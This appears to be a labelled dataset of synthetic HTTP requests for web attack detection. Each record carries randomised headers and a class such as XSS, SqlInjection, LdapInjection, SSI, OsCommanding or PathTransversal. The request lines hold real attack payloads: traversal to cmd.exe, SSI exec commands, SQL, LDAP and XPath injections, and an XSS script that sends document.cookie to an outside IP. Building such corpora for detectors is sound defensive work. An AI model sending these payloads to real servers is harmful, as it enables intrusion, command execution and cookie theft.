Accept: audio/*, text/html;q=0.0, video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=72674
Client-ip: 148.75.122.55
Cookie: iauZteY6q=886;he=dw6raatNb;pgyetteqaf3r6=r1~at;0otndXotbOw=8itslws4;oqeaoo8=8612357245
Cookie2: $Version="6"
Date: Wed, 10 Dec 08 01:38:03 UTC
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: pni8hEt@brlOo.ch
If-Modified-Since: Tue, 13 Apr 04 08:25:18 GMT
If-Unmodified-Since: Sun, 01 May 05 24:16:42 UTC
If-Match: *
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: "2tqlO7hzTvEd9x3Owg8"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: Basic YnJ5cnNuaWE6d3doZWY=
Range: 3121-127,822-
Referer: /htaohrcf.gz
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: xAsoug (oQZDm9@; o_AcLH)
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 9.0 239.185.121.92:97478
Transfer-Encoding: identity
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 131.123.223.117
X-Serial-Number: 83787585359566262
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43898
Start - Id: 43995
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.isbaahb.it
Connection: close
Accept: */*
Accept-Charset: big5;q=0.8, koi8;q=0.5, euc-jp, iso-8859-7
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: min-fresh=3
Client-ip: 203.23.228.32
Cookie: lictMeO=ns 
Cookie2: $Version="691"
Date: Mon, 20 Feb 06 05:39:45 UTC
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Sat, 26 Aug 06 05:54:21 CET
If-Unmodified-Since: Sat, 21 Apr 07 02:06:37 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Aug 08 09:11:38 CET
Max-Forwards: 9310
MIME-Version: 9.9
Pragma: remcbotW='r'
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: iozfa lptaoDn=iaErbu
Range: 7-,5039-10447,-749
Referer: http://www.yees.cz/minlo/shsep/toea/lrtb.rar
TE: trailers
Trailer: Referer
User-Agent: Mozilla/1.9 (X11; U; Open BSD i386 7.8; ih-4Z; rv:7.2.6) Gecko/09364469
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: FTP/9.7 www.hkmq8vs.htm
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: hri4/0.3, heuue/7.3
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 337660
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43995
Start - Id: 37117
class: LdapInjection
GET /eJjUvcXksn-HL/71Didt8cmdZ/Xwp-EgGmPL/n6ieTk5nretiszhk6ee/lAjfS.tiff?olto=163&coaeo=%29+++%28++++%7C%28mir%3Dndco*%29&rkesg8Y9ouL_=80704925 HTTP/1.1
Host: www.tydiThYmzA.be
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=2
Client-ip: 116.227.6.28
Cookie: Ya8ilnt9izeveta=ex-deT1;heT=2709;oiio8soeianEnw=oa&8ao
Cookie2: $Version="029"
Date: Thu, 14 Jul 05 21:41:33 GMT
ETag: W/"1hm2z.hSMJ2UX6BV@"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Fri, 23 Oct 09 07:35:45 CET
If-Unmodified-Since: Tue, 17 Aug 04 03:13:44 GMT
If-Match: "ERNyZeAE62yHcTnzMakT"
If-None-Match: *
If-Range: Thu, 28 Sep 06 23:48:05 CET
Max-Forwards: 0617
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest cnonce="cvdipt"
Range: -12929,-403
Referer: http://eEfo.st/icdit/lrTezlt.jsp
TE: trailers
Trailer: Accept-Language
User-Agent: eIb4TiN (icjEsxo; aj2wih4nXb)
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/5.1 www.ydbno6Sg.css, 1.6 20.94.179.45, 8.9 53.204.116.100
Transfer-Encoding: compress
Upgrade: tRvc9/2.0
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 4738976742686812
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37117
Start - Id: 47677
class: XSS
GET /dGWp1/eTRQRb.sh?ovsetl=%3C%21--+--+--%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F96.111.15.116%2Fng.aspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E%3C%21--+--+--%3E HTTP/1.1
Host: 177.102.110.40
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: compress, identity
Accept-Language: e8nd4t0-pd;q=0.7
Cache-Control: max-stale
Client-ip: 66.135.63.45
Cookie: nghi5lxios=emIgC5P_545C;dAhAobbsLau8o=]s a;gsslbdhc3is67nt=213680492;iadmSodHenld=206676
Cookie2: $Version="699"
Date: Thu, 23 Aug 07 15:40:10 CET
ETag: W/"B5.amP4RFDQ0Wn0"
Expect: 6dleoav=hnlO
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 05 Sep 05 13:24:30 CET
If-Unmodified-Since: Fri, 20 Nov 09 24:03:23 GMT
If-Match: "C1nWSvohfN1fmR4Gc"
If-None-Match: *
If-Range: Mon, 23 Apr 07 04:49:35 CET
Max-Forwards: 538
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: ndEnf euetw=obBhpIzn
Range: -017,-1,-32
Referer: http://x7ooheet.biz/3Mdi.asmx
TE: gzip,gzip,deflate
Trailer: From
User-Agent: edclsnd8
UA-CPU: 68000
UA-Disp: 8471,6615,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: gzip
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47677
Start - Id: 44002
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 5.208.179.63
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-ohuar;q=0.3
Cache-Control: no-cache
Client-ip: 89.252.55.156
Cookie: 1ewlrje=8ibbtftpayvsin t
Cookie2: $Version="514"
Date: Thu, 18 Aug 05 17:54:17 CET
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Mon, 12 Jun 06 18:22:47 UTC
If-Unmodified-Since: Sun, 31 Oct 04 13:16:19 GMT
If-Match: "E@teygm54glXv28"
If-None-Match: *
If-Range: Tue, 14 Jun 05 24:55:16 UTC
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: i='64tnhai'
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: NTLM aXZySWk0Z2FkZG8xY3RjZXI4ZWlodGloclpjQWRQMHBsZXM=
Range: 201-
Referer: /aqanrp2/6hd9/lc9euswT/aarIttAs/dttuKi1.bin
TE: trailers,deflate;q=0.3
Trailer: Host
User-Agent: Mozilla/5.0 (Windows; U; WinNT 0.0; gm-rt; rv:6.5.4) Gecko/78691578
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: dtee/6.1 57.199.108.21, FTP/8.6 www.rRsloae.png:18922, engh/7.1 www.42spe.tiff
Transfer-Encoding: gzip
Upgrade: tIrc/4.2
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44002
Start - Id: 40329
class: SSI
GET /sdauvtr.html?riaelea=%3C%21--%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Ctpt%5CirCy%5CItic.exe+++d%3A%5Ceia%5Cwww.alngatnine.org%5C4yEehnqnie%5Cdatabase.mdb+++++%2Fx+++exporttofoxpro%22--%3E&oaeswo2ddnrrjmg=8TnQ7KHJq0u&fruuotomd=8eawobjectro%28tnca8&vleitseggmi=and&ndYcCcatK=510 HTTP/1.1
Host: www.llo16oueo.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Date: Wed, 28 Feb 07 14:51:15 GMT
If-Modified-Since: Tue, 03 Feb 09 19:11:07 UTC
If-None-Match: *
If-Range: Mon, 21 Sep 09 21:45:06 CET
Max-Forwards: 9
MIME-Version: 0.7
Referer: /hvmbl6/aeets/cbuieor/tIawztvr.pl
User-Agent: Mozilla/6.0 (compatible; MSIE 2.0; Mac OS X; menhpmity)
Transfer-Encoding: identity

null

End - Id: 40329
Start - Id: 44762
class: PathTransversal
GET /i4Ue1T/6o09m1aRs/e9spHhAaVcIwaetei/n.8C.mdb?hdszo=7jZGt&OaA2Ms5dstdinFMX=lsAlnrc&tsawmosoMctl3h=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&oyhtevstsfhDsh=4058550283&sl=t+OisdHt&9uZkM2=4metadi%24k4%3ChomesodL&scet0syO2Eeu=55UX&eeuPnes8=onki%3CoyEafngOt&ze=ilnaf HTTP/1.0
Host: www.ryknvetn4n.gov:80
Connection: slem
Accept: image/*;q=0.3, text/*;q=0.1, audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 245.254.197.131
Cookie: tM4tT=26706
Cookie2: $Version="28"
Date: Mon, 17 Apr 06 15:09:49 GMT
ETag: "Td0bO0Q80mtdsptX"
Expect: ammm
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Sat, 08 Apr 06 07:12:10 UTC
If-Unmodified-Since: Tue, 20 Apr 10 22:58:36 GMT
If-Match: "nLzlg6vg.1un6f@my9"
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 54
MIME-Version: 8.9
Pragma: mgS='6p'
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://sfdqq.ch/w4oi39b/rt6erG/aaebraw1/ioSfdss.swf
Range: 79-,981-,-50
Referer: /6xjhphn/oreY/3eonue/aeteeSe/ms8rA8s.cgi
TE: deflate;q=0.0,trailers
Trailer: TE
User-Agent: wegsf/0.0.6.9.8
UA-CPU: Sparc
UA-Disp: 4597,5625,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 777 www.ehusd6.shtml "Aader5almnIete" "Mon, 11 Feb 08 10:44:13 CET"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44762
Start - Id: 38596
class: LdapInjection
GET /ept2kuestnyu/iFtg2LvFKrB5n-SnmN/iTI.bin?l3we0dtt=taot4%29%28%26%28objectClass++++%3D+o1JH*%29&dhUeloaevSic=5&9E4_i=sVyuc&isaonjtnm=rBjre0%3EWhnt&qouedo=zV&edspanens=92&ajnioia8h2Va=8sasserviceshttLa+eamaoa&adyqthho=seeoasua%25-o2etlOwgT&Nsya=nuwnmhvey&o9etgrrkdcnr=844905 HTTP/1.1
Host: www.tseczuy7.org
Connection: dmd9phta
Accept: text/plain;q=0.9, text/*, video/*
Accept-Charset: iso-8859-2, x-mac-korean;q=0.7, x-mac-icelandic;q=0.0, windows-1254, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: tSes-t0tto, a6-aee3celn, rn4onnsy-atieib;q=0.3, ntsicH-zyNCt;q=0.6
Cache-Control: min-fresh=24338
Client-ip: 158.4.8.166
Cookie: tnospqlsi7=NisS3j0o5eikhttps5;f6aekp=931908584
Cookie2: $Version="7"
Date: Thu, 09 Jun 05 12:35:35 UTC
ETag: W/"O.bTOUSMU2LLu9X"
Expect: 0saert
From: Henr0sl4@nexht.fr
If-Modified-Since: Fri, 05 Mar 10 21:06:24 CET
If-Unmodified-Since: Thu, 13 Nov 08 04:14:04 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 20 Jul 06 06:10:57 UTC
Max-Forwards: 675
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: NTLM ZGFyVHN0MWxpYW5nZWxpcDBuc3JyYWZldGV5aWJhbDVuZWQ=
Range: -348176
Referer: http://sw1thb.it/xdodcob.sh
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: uyyhnngko4tld
UA-CPU: 68000
UA-Disp: 761,265,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2971x6869
Via: 7.6 www.asExau.htm, 5.7 www.ttLeolon.jpg
Transfer-Encoding: deflate
Upgrade: o9ttnl/4.2, 5tnn/9.6, rmt/0.6
Warning: 619 187.93.166.222 "etLesebuo9iioii" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 379109696738614
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38596
Start - Id: 47026
class: XSS
GET /5XGmE.wFFH/tm/tezx2ii8HJV/cXhbneatheca/s2ZxDGI6Ac2pMab9qmX4/.GDSwl25o@d.jpeg?QbgsoundK6WaP3b=stortjnnrR&Elee=cXY&ya8T3th9A9eted=izX&6lnftMmrslm1s=9124&eAo=518&Aotjqvs3A=hE&6RY_CaY2I4=st&26wck=cgezt&lutnas=e9DTrn&nmywUrmuniqo1=244&oTdw=6tmh&i4cgOopesamxuTl=8crnuvn3uvtrpnazSE&rswzboA=wmrr%26b+aoetc2&y.My=d&re7ethds=%3C%3Cscript++%3E%5Balert%28%27osyea%27%29%3B%5D%3C%2Fscript%3E HTTP/1.0
Host: www.erentrhee.biz
Connection: close
Accept: text/*, audio/basic, video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tietTr-mshr;q=0.7, arshd-tt9
Cache-Control: cnueSr='atte'
Client-ip: 170.28.161.6
Cookie: agtlevklkf=a3;bsbuFah7hoett=e5PLl@owch9
Cookie2: $Version="7"
Date: Sat, 01 Nov 08 18:22:21 UTC
ETag: "gHWmyyEWa2M7g1jeAj39"
Expect: 100-continue
From: Desiah@eghc.be
If-Modified-Since: Tue, 03 Feb 04 02:18:57 GMT
If-Unmodified-Since: Sun, 12 Jul 09 23:49:52 GMT
If-Match: "ieVx5xDcPhI6G.O-4n"
If-None-Match: "CZpaCf5RW7L.av6emYQv"
If-Range: "szarhDVDUDo.5StC6mV"
Max-Forwards: 2
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: NTLM b3FraWlxdWxhc2VFdGVodDl0Y1RsYXZibmJlcG9sajV3ZXNvYnRoYXRkZmk=
Range: -0,714-,0-8516
Referer: http://sqiorr.org/nbnas/wxeizm/vyeaEt/fisr/etede.dll
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.5 (X11; U; SunOS sun4u 0.7; se-cm; rv:9.5.8) Gecko/52005566
UA-CPU: MIPS
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: 5.2 www.lcle.png
Transfer-Encoding: identity
Upgrade: pil1/7.3, dxAvc/4.0
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 239527167
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47026
Start - Id: 40726
class: SSI
GET /dDwnJ-jRg3tnLVc0je6/A@QAh6-0JBvLwO/atsjltpcroqab2iwft/rah8n4m/execM-U6/DpaonT/dss9idvF1/t1wfWtimiAisdri0i/AnoDahzaEsenohpl.nsf? HTTP/1.1
Host: 202.99.209.95
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: umaF0-Hr2
Cache-Control: no-transform
Client-ip: 70.143.133.112
Cookie: h0=9;@.NFhEN2=5;g.3YZGClike=rmej(httpbn;nunswtz=attruneemu
Date: Thu, 09 Mar 06 13:32:48 UTC
Expect: ae7na=u0tnylko
If-Unmodified-Since: Wed, 20 May 09 09:42:29 UTC
If-Match: "hB6Mw4h0Qs64u4x"
If-Range: *
Max-Forwards: 4874
Pragma: no-cache
Proxy-Authorization: tjnX ehot4z=nnOanNa
Authorization: Basic dHJPZ2E6ZWluaA==
Referer: http://www.mEeR.net/ftih/nrRstrho/hzet4/antp4oii.shtml
Trailer: Expect
User-Agent: <!-- #odbc   connect="srmr,5GwE3,yaNt"     statement="select    *    from  dm"-->
UA-CPU: x86
UA-Pixels: 665x5598
Via: 9.9 www.sct6B9ir.png, 7.6 177.6.36.252, FTP/6.7 175.216.121.36
Transfer-Encoding: AcfgnC; arae=eols
Upgrade: tnhbcr/4.1, jltoS/5.7, hnntni/0.8, kjr8nt/5.2
Warning: 850 www.etd9dho.gif "oO8csieqpnsrcset1" "Fri, 25 Jan 08 04:08:10 GMT"
X-Serial-Number: 334821
----: ----------

null

End - Id: 40726
Start - Id: 48614
class: XPathInjection
POST /ey4raRThtlste7miv3/9VGwinnt/tnDag2ni8elphasinh5k/7oJYBeb8xYp9Ffg.s/ari/ym1M-hzny_WV8slXCi0W.dll? HTTP/1.1
Content-Length: 482
Content-Language: epk,ui7
Content-Encoding: compress
Content-Location: /riQGLPoo/jelrs/ReaN1itt/teht3nha.dll
Content-MD5: ZWRhZWRpaUVhdGF4aWxpYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Jul 06 17:00:26 UTC
Last-Modified: Tue, 25 Apr 06 24:02:44 CET
Host: www.dreIrtaeXc.com
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: eahot9Te-s;q=0.9
Cache-Control: only-if-cached
Client-ip: 101.123.157.55
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Thu, 20 Aug 09 11:37:36 UTC
ETag: W/"mGiU0sGqdzcOhhW"
Expect: 100-continue
From: nhWtansu@esndihS5y.biz
If-Modified-Since: Thu, 29 Apr 10 17:13:38 CET
If-Unmodified-Since: Wed, 05 Jan 05 10:37:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 674
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Basic c3hjcHU6ZWUyYWVz
Range: 3-574
Referer: /sa61oqon/7noin8Aa/didsrr/rures.cfm
TE: trailers,gzip;q=0.9,trailers
Trailer: Referer
User-Agent: GEt6ysiherrylse
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: fssdh/6.8 www.jmeetos.gif, y4STrI/4.2 26.62.232.149
Transfer-Encoding: identity
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 3403720047412746
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

deletec3childiwwtbEdropw=ublm8tgL5oiah8l&pgeBroNida=:tes&eilPyD=0nseiaHeAa3t5&YkXsAC1OwSx5=i@wbkEh&mM7tinputi9tuJS=Etsm;eionsztt&CtVuU1LNB=unQ_MXY&QW5k=kxO&hteygasnie=@&clxbtoh0atie=sReH&ED1SOnVDREaccept9=ooG-x9ptP0&652huaniye3dius=h43@a7S&raemiSoezau2d=179   or    count(path/child::node()[position()=((i+j+k+l+1)]     |   path/child::*()[position()=(k+1)])=1   or  002=&va=g&to0twe=i5hwnafUshtdpehoov

End - Id: 48614
Start - Id: 41977
class: SqlInjection
GET /sp4L/lsPLmAe/Ij_xjsXa2/tdrop4bbAJ.rwoNP/ndGLv.cfm?bOegisesg=%27+++++OR+++%27ansstbe%27++%3D+%27aae%27%2B%27ftaaH%27&sjnrsdoewdaSm=oLtshd&selectj9emailc-=0155&wUgsguelk=t4fj1P.F&lhzieRzmttdis=9918485&1oepnal=28126588&tPr=cri%29&Dvar0dedrope6Xv=ooelopaqyoyt&Hd.dOA=6teims&nt2iehrbereoir=4&Q3Hm-TCSfromhDu=rpC HTTP/1.0
Host: www.i3ehg0essg.fr
Connection: close
Accept: video/mpeg;q=0.0, audio/x-wav, image/*;q=0.1
Accept-Charset: iso-2022-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 101.87.123.37
Cookie: nisd8enca=pcrl;yth3hn1maee=vre
Cookie2: $Version="6"
Date: Wed, 07 Feb 07 18:34:39 GMT
ETag: W/"Og0DfX_az@vGIC@GluS"
Expect: 100-continue
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 28 Feb 05 18:38:12 GMT
If-Unmodified-Since: Wed, 10 May 06 16:20:19 UTC
If-Match: *
If-None-Match: "mPM7zyqu8.scSvI"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 8351
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Digest opaque="oanyHawn"
Range: -221064
Referer: /o23s6qh/leso/9nHsc/o3NR/Jrh6e.asmx
TE: trailers,deflate;q=0.1
Trailer: If-Range
User-Agent: oxhAe/1.3.9.5
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 329x4778
Via: drtyN/9.2 www.uvoo.tiff, 5.1 169.244.158.211
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 237 www.niiai.tiff "6aniv2xeemiUvSmef1" "Fri, 09 Apr 04 14:40:51 GMT"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 382676240
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41977
Start - Id: 38776
class: LdapInjection
GET /8er6ndeabaipeiptb/nq/bw8/ivws/fr5e/tsHIv-PobZlPkk.ItV/eoIcvWoHygt3XOVpJNv/df6y9UhNwwe8sfvC8/IgZBR/daWDdfZ/ecvh82se8dhteg.mspx?iniid=T4&bz=kaccepta&insert2o9.C=%29%28+%7C++%28++++cn%3D*o++%27brien*%29%28mail++++%3D*o+++%27brien*++++%29&qzplde=837709714&hhoeegp3iirui=hps5and&eLIonoaaqreg=963264&llsWYW4aYs6=iUhdJRjK-D&4orp6jfhrcNe=1834&sNbAstl9Lt=7&u74=e%40GB4Lp0N&TkNtfuanseatca=1&re0erree=402&oh3qenhioo1otae=ldfa1TsotdVtrt&4tatpo=e%2B&aaib=a7tttexo HTTP/1.1
Host: 149.239.5.131
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312;q=0.8, iso-2022-jp;q=0.7, x-mac-japanese;q=0.3, cp-932
Accept-Encoding: identity;q=0.9, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 103.114.5.31
Cookie: Doesn1o1in8its=l3 riox;qlogj@Z3J=ietechoTa
Cookie2: $Version="55"
Date: Fri, 22 Feb 08 12:32:10 CET
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sat, 06 Jan 07 06:08:51 UTC
If-Unmodified-Since: Fri, 18 Mar 05 01:34:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 507
MIME-Version: 6.0
Pragma: tisi6t=r
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: NTLM TmFmd3RlcnpucHh4dWllY2FjZXQ1QW1pdXRmMnNveHZkaXRlYWh0OG5va25hbw==
Range: 7-
Referer: http://slUheN.org/aZme/Cdersz/zfftior/ojao4pY/arcaeqkd.cgi
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/9.0 (X11; U; Open BSD i586 2.2; ot-ht; rv:8.4.9) Gecko/47928231
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 7.4 42.10.22.200, 4.7 www.oiommmts.htm, 3.9 www.n0ds9hpt.jpg
Transfer-Encoding: compress
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 251.245.132.75
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38776
Start - Id: 45109
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: www.mayye8ht1d.gov
Connection: Vsh7qadh
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip, gzip
Accept-Language: ueuntu-7E, erEc-0x3w, krntrs-os2bdb
Cache-Control: only-if-cached
Client-ip: 154.211.218.131
Cookie: hu=7606777;AGo3YSdborr46=o;oEdp=artbsk8zb;ieehidOlthe0=uhuhNt6ucttri
Cookie2: $Version="1"
Date: Sun, 18 Nov 07 17:09:27 CET
ETag: W/"Fj-adqaO5kI8kAMZh.@"
Expect: uhxrdEf=ynXs4rl3
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Fri, 16 Nov 07 06:27:34 UTC
If-Unmodified-Since: Sat, 21 May 05 16:37:33 UTC
If-Match: *
If-None-Match: "Zx0KcJr-SWx0a1Gw"
If-Range: Wed, 16 Jun 04 07:09:52 GMT
Max-Forwards: 237
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Digest nonce
Range: -3,456-488022
Referer: /n0nfl/tltnqhra.cfm
TE: trailers
Trailer: Referer
User-Agent: Mozilla/6.3 (compatible; ynEcLoF55w; Win 9x; evrl)
UA-CPU: StrongARM
UA-Disp: 9898,841,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 213x015
Via: HTTP/5.7 www.twtBe.html, 5.7 162.246.250.192
Transfer-Encoding: compress
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45109
Start - Id: 38170
class: LdapInjection
GET /pydotrtr.exe?En1do=%29+%28+%7C%28sh%3Doue7l*%29 HTTP/1.1
Host: www.rriI.it
Connection: rrsf1d
Accept: */*;q=0.2
Accept-Charset: windows-1255;q=0.1, iso-2022-jp, x-mac-icelandic
Accept-Encoding: *;q=0.8
Accept-Language: satnHeal-babuie, wrqne-e2ucaica, rtha-Dtjo;q=0.6, ao5a7ldn-totr, ctepoDa-Y1waaaAm;q=0.0
Cache-Control: only-if-cached
Client-ip: 122.205.56.130
Cookie: 5sisi=ehb0;anxntirNuoh=3961008128;5-ycosaccess_logG1T4=rq r~;AcLztn1aghhgpde=mnheanwYnehYutw;hhdy6te=sz0@J3FXlju3;Ttn=rmornrmo
Cookie2: $Version="5"
Date: Wed, 12 Dec 07 03:05:57 GMT
ETag: "VttqQ6PbSrQIFWIR0Z"
Expect: itgdtcl=icezz
From: b63ter3o@6adqse.net
If-Modified-Since: Fri, 09 Nov 07 06:09:34 GMT
If-Unmodified-Since: Tue, 16 May 06 10:59:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 5.5
Pragma: pbfTb='A1sEoBtc'
Proxy-Authorization: Basic Z3JzYXNlMDplb2hzNWtxZA==
Authorization: Digest opaque="apo2Yo"
Range: -58269,-622
